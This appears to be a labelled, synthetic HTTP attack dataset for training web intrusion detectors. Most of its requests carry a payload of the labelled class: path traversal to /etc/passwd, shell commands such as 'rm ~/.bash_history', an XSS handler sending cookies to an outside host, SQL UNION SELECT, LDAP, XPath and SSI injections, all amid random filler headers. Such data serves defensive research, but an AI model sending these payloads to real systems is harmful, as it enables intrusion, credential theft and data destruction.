Max-Forwards: 2022
MIME-Version: 7.5
Pragma: eRot='7e9rdKid'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: Basic bkllNklrdzptcGlDbGRvNw==
Range: 4539-14148,-19,934-
Referer: http://www.ooeyds.com/9at9no/anseok.gif
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 6.4; tn-wo; rv:4.1.5) Gecko/33403215
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: 9.3 www.zieguner.shtml
Transfer-Encoding: gzip
Upgrade: sssi/2.7, rim/3.4, mCeth/1.0, n82sil/5.7
Warning: 028 56.37.102.108 "t6tlhhan1eX2IilnhgP" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42243
Start - Id: 46285
class: PathTransversal
GET /ncuaane/eif4RdhhkeZDGAoZtzX/eMknFWIWF/dropj/gbAs0/1PZ2D5access_log/aRDP_e/50tOdU.bV207is/FUnKTx-WumS.sh?tnnRojr=5370&geubzOniei78e3=oilaiE5Noore&nhyjdlNinbi8eio=e%3Ewsll%24ib&_wSoeval4=%2Fetc%2Fpasswd&d7ze7=nratt&gssterhacomTa=aenln4h+sL2f%7E+his&IzN5heetbe6H=ercpbiDmnilc1%5Deeosa&lnaweop=3RScl071msoofo&IrhnlDituansm=2documentwbt&esdatov4SlBro=alaaanulltAiscriptr&tytmefAmdir=mqoftJmiose0octgo&iztpewfwetTo=uIhq8ti7hsauoi5&V8L7WxLWpdkD=metabwdocumentpt HTTP/1.1
Host: www.iieods.de
Connection: keep-alive
Accept: application/*;q=0.2, video/*
Accept-Charset: x-mac-chinesetrad;q=0.1, windows-1250;q=0.7, iso-8859-8-i, iso-8859-8-i;q=0.3
Accept-Encoding: deflate
Accept-Language: 0-tc1irom;q=0.3
Cache-Control: only-if-cached
Client-ip: 54.146.114.194
Cookie: 4dQ=y2H4retigxeobtyism;9qaccess_logBDxmljandxp_=ectuel3rsse4msyhaq;4nlstiwIl=cconnectis;dnoeaher8=sot8tEh;6a8m=ubs6_x63d0NO
Cookie2: $Version="3"
Date: Thu, 20 Aug 09 17:01:58 GMT
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Sun, 28 Jun 09 01:45:42 UTC
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "qQGXZdTgFVV2GicZ2Yz"
If-None-Match: *
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 5
MIME-Version: 4.9
Pragma: iar=pledad15
Proxy-Authorization: Ceatcl leufemEy=AhEdaAee
Authorization: Basic ZXRyOUk6N2xtc2g=
Range: 5-,07-2
Referer: /rusq/wZsu/ucset/ncddjt.wav
TE: gzip;q=0.8,gzip;q=0.2
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.9 (X11; U; Open BSD i386 8.0; nt-ss; rv:4.6.4) Gecko/73178587
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/4.5 www.hoilnfta.jpeg, son/7.5 www.ee4twimK.js, HTTP/4.0 www.kcyeNoeD.htm
Transfer-Encoding: dseWa; err7=sIiEEEF
Upgrade: Su9qj/8.6, baec/7.2
Warning: 283 165.131.195.235 "tsglezenghAmr73slp" "Sat, 19 Sep 09 07:14:05 CET"
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 576547919315
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46285
Start - Id: 46310
class: PathTransversal
GET /eTi0oyoyle2pta5g/siodrrd2ds/doebOsnmv.gif?4T8w26E=eGani%26eueity3ard&ua5bZar5eoE6a2a=2zs%2BNc&EaseqooenxsaiAm=neehmmyeeatrxie6u&0IdRaicas=3673&letnsoe=187&HASwwK5y=4370139&adR=egqw&UucopycatyHC-tmpnJ=a4&sdintzWtkner=%2F%2C%2C%2C%2Fneut%2Fll%2Fpasswd HTTP/1.0
Host: www.el5lawi8.net
Connection: arAifr7
Accept: application/*, audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.6
Accept-Language: 8Ccolee-2, 5o-91ctOoH;q=0.4, tctteehd-wAa
Cache-Control: no-store
Client-ip: 208.222.203.198
Cookie: SalhcLiesvrTc=075506;seihaabo=128;auteeaAusXnx=ey1Uqe8vqK
Cookie2: $Version="3"
Date: Sat, 11 Dec 04 20:14:04 UTC
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 12 Aug 04 19:35:31 GMT
If-Unmodified-Since: Mon, 03 Dec 07 01:57:14 UTC
If-Match: "zEvQburn.bU2AmFOXP5a"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 605
MIME-Version: 2.5
Pragma: Etpr5=py
Proxy-Authorization: Digest response="c973fB96c44fD6a45864DFA7cb1fB18f"
Authorization: Digest username="o4ry1n"
Range: 426-9089,-721
Referer: http://www.tel8sul.be/ebbbslb/TsX1.php4
TE: trailers,trailers
Trailer: Expect
User-Agent: TsIehn (tEDDiHMt7)
UA-CPU: Sparc
UA-Disp: 609,9430,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.5 66.111.4.180, tIo/8.1 114.146.227.57:61
Transfer-Encoding: identity
Upgrade: iNrqo/0.0, 3ii6c/7.6, pN6ieo/9.3, uda/6.3
Warning: 507 www.fij6i.htm "ebesreamwt" 
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46310
Start - Id: 44549
class: OsCommanding
GET /bin/votvsoO.pl/seite=;cat eshop.pl|? HTTP/1.1
Host: 246.128.105.244:44
Connection: close
Accept: image/png
Accept-Charset: *
Accept-Encoding: identity;q=0.0, identity;q=0.5, deflate, deflate
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 15.83.253.70
Cookie: @1orsock_streamDobody=aresaIouruhx;ta=39551724;S8S3Ow0=6230764;eenitrkaoa=te;8vautoexecoSp=te@lvbscriptperl$ale
Cookie2: $Version="7"
Date: Thu, 02 Dec 04 20:35:34 CET
ETag: W/"c5DougppZMb-TujuT3"
Expect: 100-continue
From: tzi1ete@elNpu.cz
If-Modified-Since: Mon, 28 Dec 09 23:50:38 UTC
If-Unmodified-Since: Fri, 22 May 09 02:25:01 GMT
If-Match: "JYZEs@uQtoT38q9rf11B"
If-None-Match: "Rac20ZHVWp9u2Qyv41F"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 7
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: Basic dXZ1b2FlcmE6b2lpaHRlZXQ=
Range: -06354,383-6635,26244-
Referer: http://soesuuy.com/eaiuilm/snts/iDamnkS.cgi
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 7.0; Tp-h9; rv:7.5.4) Gecko/62639602
UA-Pixels: 8286x4573
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: deflate
Warning: 178 www.psrrz.gif:1 "5eiuelyVouirXa" 
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44549
Start - Id: 45302
class: PathTransversal
GET /bQRl9/srfTl5c1dnWq/olJ/3c8r4R/as06SJh-pb5dP7sZ4/flX0vhVTyV/Tl0dGnKwget_phpKautoexeciAj/eOtaswdmieBgiykGiir/beennyjswei/tmbHce3tuGlMDbR/ia8les3edc0i/tiIBrh.aspx? HTTP/1.1
Host: www.gncse.com
Connection: keep-alive
Accept: text/html;q=0.2
Accept-Charset: ks_c_5601-1987, windows-1258, cp-932;q=0.3
Accept-Encoding: d:\windows\boot.ini
Cookie: oura=iMte;tr6dEha06p=ieyog;olunionBwhOo5bV=17;bmesebwxiuat=39
ETag: "BUk8NvAlThDuQVHd"
If-Match: "EinjldyMigy3071"
Max-Forwards: 3414
Authorization: Digest nonce
Referer: http://tpsja.biz/dI6ps/eesmt/wanardi.css
User-Agent: e6e8ow/1.0.9.8.2
Upgrade: hbyi/9.8, oau8e/8.0, oroaiL/0.1, uq9dqe/3.1, ckig/4.9

null

End - Id: 45302
Start - Id: 36755
class: OsCommanding
GET /iG/5-SEllmDIsXvP@GYZSL/lDbMN1Wig/9etitsdmtBRnTme/0b8snseACcfari/iis5ntmlqookb/ehYlQrvIodn4i/replaceXx/attheo7ngeetp/icoiohi/nNeoe/bdeCk.js?rfrttgha2tto=7H6EhW&setejeihs=bc6&Hss5od8eahrhdeu=imTUp&ott=rDgprcohm&cis=%27++++%3B+++++rm+++%7E%2F.bash_history%3B&nbtDn8cdrjthiat=1osAdt%29ehc HTTP/1.0
Host: www.wfy8jt7m.uk
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.4, compress;q=0.7, gzip;q=0.0, compress
Accept-Language: p-crSb;q=0.4, nfr-n;q=0.3, han-ytgzeCy, c-AS8tih;q=0.4, dO-q;q=0.5
Cache-Control: max-age=6920
Client-ip: 66.186.73.243
Cookie: e6e4WGErnre=heG7efdCnkEobhsp;rogl1Sueoeo=33123701
Cookie2: $Version="576"
Date: Tue, 04 Oct 05 24:36:36 GMT
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Wed, 19 May 04 04:29:15 UTC
If-Unmodified-Since: Sun, 03 Aug 08 14:20:54 UTC
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "XISmt7q2iLSY2FHm"
Max-Forwards: 3
MIME-Version: 5.1
Pragma: rrne=tmgtw
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: Digest uri=/s4bleeni/AsitIdO/atwNr/cn7ee.doc
Range: 8-,6-50
Referer: /faaxroeo/el7sFht.tar
TE: deflate,trailers,gzip;q=0.4
Trailer: Cache-Control
User-Agent: jJk4.azxvX http://www.tsyais.cz
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 232x1783
Via: 5.9 www.bxici.css, FTP/6.7 201.125.173.100, inkn/3.9 234.106.150.30
Transfer-Encoding: ednls
Upgrade: m25Nxw/7.3, m4ur5a/7.5, dhis/6.5, Ote/9.2, ant/5.0
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36755
Start - Id: 49024
class: XPathInjection
GET /mLJg/oihxrhi1/nuH/pMYbyOnG-79DAF-@vIOf/yetVrkiros8ensEv4u/sdtcenlnonwm3hje/bsnqfce4eusneeeigeol/relErhxhM3ecotwcthei/iAEzJfEz0JEK--3lh2.html?etcOzmE5eC_oaO=edV88.&ese7pega=32&nt4=3405910819&nai=aozKtUtF2&dsiiHuhl=irData&egwjeaoAen=9318932&ett=77578182&s1eaacAi=25475++++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+0525%3D&ett=Terunc8%2B&7aUouu=atsulbetniTkt2a&Efeldochi=fnaixnSseeeeiloAg6&S3fromIsvHPTCrZ=tnoF&cnuo=xtmptt+eknisfydsupdate&srmgGHmiframeoeAc=3rB&nD@odP.1sv=o30IMoa6JLps HTTP/1.0
Host: 47.19.133.149
Connection: close
Accept: image/*, audio/*;q=0.3, application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: rwe-urcwpha;q=0.7, r86v2tW-t1ino, eelhhrtL-dpd;q=0.1, rwthacE-ahut4axo;q=0.5
Cache-Control: min-fresh=3707
Client-ip: 218.235.95.33
Cookie: to=7064058;h0yYF@Pb=aOH;4p0ryniho=ite;pMd@QEc5having=fa8
Cookie2: $Version="4"
Date: Sun, 16 May 04 19:23:35 CET
ETag: "hqas.qShK2Qyew_tqh"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 10 Feb 08 18:26:22 UTC
If-Unmodified-Since: Sun, 21 Sep 08 22:52:12 GMT
If-Match: "Ed3i-XvroSmJ0AiKxP"
If-None-Match: "ty_Ki87YMOpe8dpkshkX"
If-Range: *
Max-Forwards: 4555
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: t597i7 s1mtW=e9ixee
Authorization: Digest algorithm=MD5-sess
Range: -31
Referer: /eaemo/uacss/i8tieE/VxaaeiEi/hBftmybo.wmn
TE: trailers,trailers
Trailer: Pragma
User-Agent: roMi6eXxP http://www.mokio.de
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/2.4 159.197.112.36
Transfer-Encoding: identity
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 729105256131367
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49024
Start - Id: 37667
class: LdapInjection
POST /uJ9NkvGkvpU6t2yrTt4j/kGserki1eboonicts/ef_./u@UeZQAvCHT/8rA3G1U6jl.m/d61BBBdJQ85AmT67pot.jpeg? HTTP/1.1
Content-Length: 102
Content-Language: qswbibl8,hd,qrioaos
Content-Encoding: gzip
Content-Location: http://www.uprtr.org/rrnrtae.jsp
Content-MD5: bXNhcTRvdXVqZHJvb2hyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jul 09 19:39:25 CET
Last-Modified: Sat, 03 Feb 07 08:15:25 UTC
Host: 65.111.88.182
Connection: keep-alive
Accept: audio/*, text/plain, text/plain
Accept-Charset: x-mac-arabic, x-mac-chinesetrad, utf-7;q=0.3, iso-2022-kr;q=0.3, iso-8859-2;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 109.33.117.29
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="729"
Date: Thu, 04 Jan 07 03:48:29 UTC
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: eavrng@Ual9isu.biz
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Thu, 16 Dec 04 15:42:40 UTC
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: *
If-Range: Sun, 24 Jan 10 07:58:54 CET
Max-Forwards: 2642
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: nihy nt9ae=tehotaw
Range: 7-75,773-,28-851
Referer: /ed5aleet/ReEtEp.asmx
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/2.0 (X11; U; Solaris 8.2; cx-N6; rv:6.8.0) Gecko/22344114
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: identity
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 0737126851
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HwbHOG__.Fh=ueda)(   | (hmIl=*)&egfwindow.openqaX-=0da&wzsexE=2Sa|c(g&eelsdennp=tl; 

End - Id: 37667
Start - Id: 47138
class: XSS
GET /haior4ewhtEnetq/c9Wj./5onaer/iux9qZH/0t7rLltvr/01D4FTDAN@FflPg/geSqirl/rhy2rwlfav.tiff?ilehsttdm=o57FPHB2&fsi3esr=75718&io5sauH=bd&ecasuokithp=1653187&Z51H%uin8=hzeIiRyK.t&7N=%3Cimg+++++src%3D%22+++++ta+++%3E++++%22+++onmouseover%3D++++%22+++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.el.com%2Fcgi-bin%2Fanchonna.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&kou=49337&tde=document6%3E&wCid7wgOgysr=iols2ai9s HTTP/1.1
Host: 210.127.162.249
Connection: keep-alive
Accept: text/*, image/*;q=0.6, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.7, compress, gzip
Accept-Language: *;q=0.1
Cache-Control: a9u='texeb'
Client-ip: 234.7.219.10
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="732"
Date: Tue, 23 Jun 09 09:42:23 GMT
ETag: W/"DaLjRExWtsG.SEkNd"
Expect: 100-continue
From: SntgwR@dDthvRF0b.it
If-Modified-Since: Tue, 07 Dec 04 02:13:31 CET
If-Unmodified-Since: Tue, 28 Apr 09 12:45:48 GMT
If-Match: "1SNI7.GHyFvSP_@Ea"
If-None-Match: "DL3W8BUaeHSYMCzR615"
If-Range: *
Max-Forwards: 36
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM c2VzcmUwUTJpZWV5b3RvZWNTdGhodGVjaXN0b3BhbnNzYXdidHR1c3o0c2lPVw==
Range: -63707,310050-133
Referer: /eeli.gz
TE: trailers
Trailer: Via
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 2.9; se-og; rv:4.1.1) Gecko/75362634
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 673x645
Via: 5.5 201.223.246.78, 4.4 www.e0sar.css
Transfer-Encoding: compress
Upgrade: 8cCE/0.8, oso9/9.4, 3nw/2.9, zDsi/8.2, 6hhwb/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47138
Start - Id: 41829
class: SqlInjection
GET /Qbgsound36166K7-1/PYX2vmYxZadD/cWWz/fNrelo/tItonrasdOe/he26Ciec.png?aQgroup byIxx=r-eegarmNpT%3F&XVecho3u3t=%29np%3AcI0zc4eeh%5B%28t&enEnAdein0e1na=81715&irlrxkenEaelo=2527123065&twrxPba=1&y5aiaavE=0&2aa9talc=doe&gElla3a=nO75%3Caewt3hr&qwu9@HBselectselectS=++++OR++2++%3E++1&lCDbTNianNaezsi=t.9hEM&ehhA8gtric4enOi=hudnttrHDitRE&oea=n%40sock_stream0&aheEmtha8hRaai=398337&du3aS2l=7036576119&QIH6pWONTb0aM=861976697 HTTP/1.0
Host: 211.57.152.222
Connection: tfLtu8ta
Accept: audio/basic;q=0.0, application/x-tar;q=0.0, audio/basic;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: sh-9ees5sd
Cache-Control: alfr5ot='mriaLl'
Client-ip: 196.90.56.27
Cookie: garo1qbteitsrgu=532737;mDlMWCmeta=ee5teaxrrlii;ujRAformMP=54376835;CSkPQpP=eubszgQK;5e=7tihiqnnmriart4
Cookie2: $Version="7"
Date: Sun, 21 Dec 08 20:02:36 UTC
ETag: W/"sEO6-Hh4WcNew12P"
Expect: jao4e=iser
From: wIdO@lerc.gov
If-Modified-Since: Sat, 06 Sep 08 10:56:55 UTC
If-Unmodified-Since: Thu, 05 Jul 07 20:59:01 GMT
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "s3oQO.K0pDBrHcoMoKeU"
If-Range: Fri, 14 May 04 23:16:24 CET
Max-Forwards: 0241
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: berie 8peinf=aesruuT
Authorization: NTLM NG1lc29vaHRGd3F0ZWxzZWc5YnJlY3NhaWlvMmpuaDlzbGVlYm1uRWU0bnlt
Range: -0842
Referer: http://www.weeE8bd8.st/M3peaC5e/lsuri/PirR/nkel/9ata.php4
TE: trailers
Trailer: Max-Forwards
User-Agent: fxe0sevi (dKPdI2pl; eQLHvpluK)
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: identity
Upgrade: hcsrst/2.9, leHto/5.0, t6B/6.8, iheSt/9.4
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41829
Start - Id: 42727
class: SqlInjection
PUT /fG2v0vE4D/deuNZfHlmlmIZwVWlq/WMYdocumentYJ/lctey8ieDdlTjit.pl? HTTP/1.0
Content-Length: 131
Content-Language: hTe,WtnTp,ameo
Content-Encoding: gzip
Content-Location: /dfghR/emo7i/aD6slvU.js
Content-MD5: NHVxZWxQQWh6bmRVaWk4aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Oct 05 09:08:39 CET
Last-Modified: Tue, 08 Nov 05 06:20:35 UTC
Host: www.ttr8bNhwy.gov
Connection: tifmoj
Accept: */*;q=0.0
Accept-Charset: isiri-3342, euc-kr;q=0.7, iso-8859-7
Accept-Encoding: chairs'  UN/**/ION   SEL/**/ECT   vne   FROM    dba_users  WHERE     ollEli like '%25
Accept-Language: kipyte5a-h;q=0.1, ii-e
Cache-Control: min-fresh=68044
Client-ip: 90.28.189.51
Cookie: SZgseEsancew=botxmoedad;hobdbdnhclcta=9aRdb5ooan
Cookie2: $Version="85"
Date: Fri, 11 Aug 06 20:50:46 CET
ETag: "q3oqje8J1wPsNQzx"
Expect: 6srs
If-Modified-Since: Sun, 19 Sep 04 16:19:48 UTC
If-Unmodified-Since: Tue, 15 Nov 05 03:17:18 GMT
If-Match: "VLWWx4Xx-rvb_nQp"
If-None-Match: "dZCLilee_iqTP5.kAJ78"
If-Range: Sat, 20 Feb 10 19:07:02 GMT
Max-Forwards: 2334
Pragma: no-cache
Proxy-Authorization: Basic bzNheWxxOnZyb29paQ==
Authorization: Digest qop=auth-int
Referer: http://mr0bo.fr/olsdg/ozspar/nobkCepl/anpuUtpn.png
TE: deflate;q=0.4,trailers
Trailer: Date
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 0.2; rd-Fi; rv:6.6.1) Gecko/33215161
UA-CPU: x86
UA-Disp: 0603,672,16
Via: 7.9 www.haeh3wlo.html, 9.2 37.247.152.88, nrG/4.1 109.239.104.234:2053
Transfer-Encoding: deflate
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

2atWwedOua0wni=36709&etem=JCOrm&hlIa=437090&9ps=627&io=8043774&gsfa=b \lrat-12%zeo3a&cs=23107538&farxs=73505&Tsspb=edtaeUrehfe3

End - Id: 42727
Start - Id: 38311
class: LdapInjection
GET /33ChGcS3L88iW/oohornT5ifnt0E/9W/ms1cecnadahUSool/gZhbvF3JYRKRS5/flileh/rnB.jjsUSM1gK/U8HpO4/otgeeepdoTahbe.jpeg?rrfieqhOiDPa=sN4&scriptmailT4-MpoQZ=%29%28+%7C++++%282on%3Di9sie*%29&bghmnTa0tt=SowT%29 HTTP/1.1
Host: www.fntlr.de
Connection: qrothele
Accept: video/*;q=0.4, video/*
Accept-Charset: cp-932;q=0.3, x-mac-arabic;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 2.55.18.28
Cookie: cayeeeauEh=daxs;rsnrnsa0Lhnps9=siearsboolmteFgbp;olsde9Psiel=eOTT_Y
Cookie2: $Version="14"
Date: Sun, 04 Apr 10 21:54:03 CET
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: A5rn=vo3il;oawRs
From: d1eT@h3tn.fr
If-Modified-Since: Wed, 14 Oct 09 08:42:12 UTC
If-Unmodified-Since: Thu, 20 Mar 08 19:44:56 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Oct 08 16:00:50 CET
Max-Forwards: 02
MIME-Version: 3.2
Pragma: lsid='seYRq'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: et9ei fHAiir=otnroeir
Range: 529307-,-0
Referer: http://le0h.uk/5e5s/otesmha.gif
TE: gzip,deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/4.4 (X11; U; Linux i386 7.9; l8-3g; rv:9.9.5) Gecko/04168392
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/4.5 138.49.2.137, FTP/8.3 www.gyhsieir.shtml, 1.1 239.183.221.127
Transfer-Encoding: identity
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38311
Start - Id: 37248
class: LdapInjection
GET /ernhnblBagckma/v.ZK8fhKGg0jE.hoY/dmcnsrtrUwop1De/i01v1TC/arxmpuBlXmn4YC/QOYR4b4jkLZ1f/SpgMyiN8UdctHnieh.nsf?g7ss3ommExwh=n%3E&foloegiOr=tb40.snks&sUssmnduxao=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&aejyxmii=uiZwHzVOR&beEeqkjort4ecef=ea3mjl&ojy=sybuMnA4jtIx&3ushmqoeoaw7yVo=b3+ltu&TCchildu86i=ixh4Rd_VL&y3s9serrbnbty=1&kLe=3 HTTP/1.0
Host: 248.219.179.169
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.5, deflate, compress, compress
Accept-Language: *;q=0.5
Cache-Control: min-fresh=987
Client-ip: 112.64.200.186
Cookie2: $Version="04"
Date: Sat, 04 Apr 09 21:43:22 CET
ETag: W/"6-4YAl_C57LZ5Kihr"
If-Modified-Since: Wed, 31 Mar 04 24:26:30 CET
If-Match: *
If-Range: "AGU2OlZNtrOh4AZp"
Max-Forwards: 194
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic YWFjdHJzODpvZm9kcw==
Referer: /sueh/sehrso/bfAuteSi/roitalsw/apte.gif
Trailer: Referer
User-Agent: Mozilla/3.8 (Windows; U; Win98 1.5; ns-ra; rv:5.1.1) Gecko/05732285
UA-CPU: 68000
UA-Color: color32
Via: 0.8 40.69.88.183, FTP/1.4 www.eeylu7t.gif:4876, 3.3 www.aooza3.jpg
Transfer-Encoding: deflate
----: ------------------------------------------

null

End - Id: 37248
Start - Id: 40565
class: SSI
GET /emetw5e6iRaoa/uap9uuephfgintI/c8VNmiyNh/nctNC5trcp9Pw/iFf_/om/oghbDRE9WmYWq1r/W6DIY/8gqbAQxeo9oerrvPQ/tv7cov1jLi2.jpg?Tt7shSfe=8788619&iftieoLbnaho=3wcilytaccepte6u0a&itnd=ejts+lhntbsr%3FnperltceE9&v0Twhfacanho=255846532&group by@0xVKRc0=81343011&rumN=1230579&rrbad=054717&ia=%3C%21--+%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&Ikok=146218&eqEctJsxynh=ihpowqe93Ta&ExlL2tti=aardns&nsnatsqdeN=tZwMSM1&urR=e7mochajedlbdc+h1mHoe%27&1tni=3 HTTP/1.0
Host: www.ReiE.st:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, compress, compress, deflate;q=0.9
Accept-Language: laco-wr;q=0.3, nh7ageyD-cShdto, oiepto-js2, h-fyp1hoi;q=0.0
Cache-Control: max-stale
Client-ip: 65.35.166.11
Cookie: snavpdklhsemMl=eaAposition;oeioawktrr=te3o2r7ssnedt;ie7=1163514;6hFvwL1rotiOt6T=riesWiqt7sfs8hThm
Cookie2: $Version="84"
Date: Tue, 11 Oct 05 10:19:07 UTC
ETag: "Mi8IDS@hpBaV6Zqy0"
Expect: Dmgzlepg=aTdpeoAa;8eizrast=eadti
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Sat, 28 Feb 04 14:00:49 UTC
If-Unmodified-Since: Wed, 14 Jan 04 02:35:13 GMT
If-Match: "dEMvzW.D2QQLuE3ly"
If-None-Match: "Cp617.MRsM_Jv0rNAjAZ"
If-Range: Mon, 09 Jun 08 20:50:18 UTC
Max-Forwards: 14
Pragma: no-cache
